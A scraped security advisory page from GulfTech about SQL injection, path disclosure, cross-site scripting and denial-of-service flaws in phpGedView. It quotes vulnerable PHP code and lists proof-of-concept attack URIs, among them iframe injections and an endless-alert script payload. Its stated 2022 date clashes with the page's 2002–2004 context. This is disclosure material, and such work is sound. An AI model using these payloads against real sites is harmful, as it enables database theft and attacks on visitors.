GulfTech Computers - Professional Computer Services  
Additional Links
-> Dicussion Forum
-> Encryption Tools
-> Information Tools
-> Net Info Tools
-> Latest Advisories
-> Latest Vulns
-> Latest Win Software
-> Latest Nix Software
-> Security News
-> Security Press
Recent News

GulfTech Computers strives to beat the price(s) of any other business around. Check with us first as it just may save you some time and money. And who doesn't want to save money? Please contact us with any questions or inquiries.

Latest GulfTech Releases

SubScan v1.2 Scans a domain for DNS records and SubDomains. Very stealthy, and can be used to find many hosts not on the public netblock. A very interesting tool to say the least. Works on both Nix and Windows based systems. Get it now!

Download SubScan v1.2

Search GulfTech
You can use the form below to search our site. Just enter the keyword or keywords to search.
Latest Advisories
SCO Security Advisory - OpenServer 5.0.6 OpenServer 5.0.7 : uudecode does not check for symlink or pipe (SCOSA-2004.7)
SCO Security Advisory - OpenServer 5.0.6 OpenServer 5.0.7 : OpenSSL Multiple Vulnerabilities (SCOSA-2004.10)
SCO Security Advisory - OpenServer 5.0.6 OpenServer 5.0.7 : Xsco contains a buffer overflow that could be exploited to gain root privileges (SCOSA-2004.3)
SCO Security Advisory - UnixWare 7.1.3 Open UNIX 8.0.0 : Xsco contains a buffer overflow that could be exploited to gain root privileges. (SCOSA-2004.2)
Microsoft Security Bulletin Re-release, August 2004
Latest Vulnerabilities
OpenFTPD Format String Vulnerability
Fusion News Unauthorized Account Addition Vulnerability
Jaws 0.4 Authentication Bypass Vulnerability
DansGuardian Hex Encoding URL Banned Extension Filter Bypass Vulnerability
LostBook v1.1 Javascript Execution Vulnerability
Latest Security News
Anti-spam spamvertisers agree to quit
Black Hat day 2 sounds security alarm
VPNs (Virtual Private Nightmares)
HNS Newsletter issue 224 has been released
Long-awaited IE patch (finally) arrives















Multiple Vulnerabilities In phpGedView
January 13, 2022


Vendor : phpGedView
URL : http://phpgedview.sourceforge.net
Version : 2.65 beta 5 > All Versions(??)
Risk : Multiple Vulnerabilities


Description:
The phpGedView project parses GEDCOM 5.5 genealogy files and displays them on the Internet in a format similar to PAF. All it requires to run is a php enabled web server and a gedcom file. It is easily customizable for use on many different web sites. It is one of the top 10 most popular projects at SourceForge.


SQL Injection Vulnerability:
phpGedView has a few files which are vulnerable to SQL injection. The vulnerable files are "timeline.php" and "placelist.php" The vulnerabilities are a result of input not being properly validated. The data given to these scripts are then executed by the "functions_mysql.php" file. As we can see below the $parent_id variable as well as the $level variable is passed directly into the query without being sanitized by the script at all in the "get_place_list()" function.

-----[ Begin Code ] -----------------------------------------------------------------
//-- find all of the places
function get_place_list() {
global $numfound, $j, $level, $parent, $found;
global $GEDCOM, $TBLPREFIX, $placelist, $positions;
// --- find all of the place in the file
if ($level==0) $sql = "SELECT p_place FROM ".$TBLPREFIX."places WHERE p_level=0 
AND p_file='$GEDCOM' ORDER BY p_place";
else {
	$psql = "SELECT p_id FROM ".$TBLPREFIX."places WHERE p_level=".($level-1)
	." AND p_place LIKE '".$parent[$level-1]."' AND p_file='$GEDCOM' ORDER BY 
	p_place";
	$res = dbquery($psql);
	$row = mysql_fetch_row($res);
	$parent_id = $row[0];
	$sql = "SELECT p_place FROM ".$TBLPREFIX."places WHERE p_level=$level AND 
	p_parent_id=$parent_id AND p_file='$GEDCOM' ORDER BY p_place";
}
$res = dbquery($sql);
while ($row = mysql_fetch_row($res)) {
	$placelist[] = stripslashes($row[0]);
	$numfound++;
}
}
-------------------------------------------------------------------------------------

Below are some URI's which can be used to exploit the issue explained in the paragraph above. Also included is a URI that triggers a somewhat similar SQL vulnerability in the "timeline.php" script.

/placelist.php?level=1[Evil_Query]
/placelist.php?level=1&parent;[0]=[Evil_Query]
/placelist.php?level=2&parent;[0]=&parent;[1]=[Evil_Query]
/timeline.php?pids=[Evil_Query]


Path Disclosure Vulnerability:
There are a decent number of ways an attacker could disclose the full path of the web server, thus aiding in the information gathering process preceding an attack. Below are a list of the vulnerable scripts and proof of concept URI's to reproduce the condition.

/indilist.php?alpha=\&surname;_sublist=\
/famlist.php?alpha=(&surname;_sublist=yes&surname;=\
/placelist.php?level=1&parent;[Blah]=
/imageview.php?zoomval=blah
/imageview.php?filename=/
/timeline.php?pids[Blah]=
/clippings.php?action=add&id;=Blah
/login.php?action=login
/login.php?&changelanguage;=yes&NEWLANGUAGE;=Blah
/gdbi.php?action=connect&username;=Blah


Cross Site Scripting:
I have found over a dozen instances of Cross Site Scripting in phpGedView, but there is probably more. The impact of these vulnerabilities are self explanatory; they allow code execution in the context of the browser of someone viewing the malicious URI. Below are examples of the numerous XSS vulns.

/descendancy.php?pid=<iframe>
/index.php?rootid="><iframe>
/individual.php?pid="><iframe>
/login.php?url=/index.php?GEDCOM="><iframe>
/relationship.php?path_to_find="><iframe>
/relationship.php?path_to_find=0&pid1;="><iframe>
/relationship.php?path_to_find=0&pid1;=&pid2;="><iframe>
/source.php?sid=<iframe>
/imageview.php?filename=<iframe>
/calendar.php?action=today&day;=1&month;=jan&year;="><iframe>
/calendar.php?action=today&day;=1&month;=<iframe>
/calendar.php?action=today&day;=<iframe>
/gedrecord.php?pid=<iframe>
/login.php?action=login&username;="><iframe>
/login.php?&changelanguage;=yes&NEWLANGUAGE;=<iframe>
/gdbi_interface.php?action=delete&pid;=<iframe>


Denial Of Service:
It is also possible for an attacker to launch a DoS of sorts against a user who visits a certain URI. The vulnerability is in the language variable not being properly validated. If an attacker sends the following URI to a victim, they will not be able to access the phpGedView web site until they either clear their cookies, or manually reset the language settings by typing in a valid URI to reset the language back to something acceptable. The phpGedView website will not be able to be viewed by the victim until then.

/index.php?&changelanguage;=yes&NEWLANGUAGE;=[Junk_Here]

Or even one hundred million times more annoying is this :P

/index.php?&changelanguage;=yes&NEWLANGUAGE;=<script>var i=1; while(i){alert(i);};</script>

As I mentioned before though, it is possible to regain a normal session by manually typing in a value in the language variable that is acceptable to phpGedView.


Solution:
These vulnerabilities have been addressed in the latest beta release. Users may obtain the latest beta version at http://sourceforge.net/project/showfiles.php?group_id=55456


Credits:
Credits go to JeiAr of the GulfTech Security Research Team.






© Copyright 2002 - GulfTech Computers, All Rights Reserved
Contact GulfTech Computers